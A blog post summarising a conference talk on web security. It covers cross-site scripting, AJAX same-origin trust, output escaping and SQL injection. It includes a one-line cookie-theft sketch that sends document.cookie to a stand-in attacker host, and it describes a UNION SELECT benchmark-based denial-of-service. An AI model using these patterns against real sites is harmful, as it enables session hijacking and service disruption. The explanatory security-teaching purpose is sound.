Bigbro's foray into the scary world of blogging
Christian Wenz
This discussion proved so popular, with people spilling into the aisles of the room, that this presentation was moved to the larger business track room, displacing it. Some minor reshuffling later, we settled in to watch Christian's presentation.
Where should people be taught about security in programming? On average, almost one vulnerability per day is detected in OSS.
With forms that accept arbitrary text, javascript code can be inserted. script tags can be inserted and cookies can be grabbed by http://loser.tld/? + document.cookie; or similar. This means that the cookie can be stolen without the user knowing. XSS has been around on the web for a long time now.
With AJAX / XMLHTTP Request a whole new set of possibilities opens up. There is a security model in place (same domain) but do you trust your browser to enforce this?
Escaping <, >, &, "e;, ' does the trick, but be careful of the charset. Stripping script tags does NOT do the trick, because of pseudo URLs.
With databases, SQL Injection can allow access to the data - including private data. Some examples were given of basic SQL injection attacks. This included a demonstration of DoS by making an injection attack benchmark a UNION SELECT which generated md5 hashes of random data.
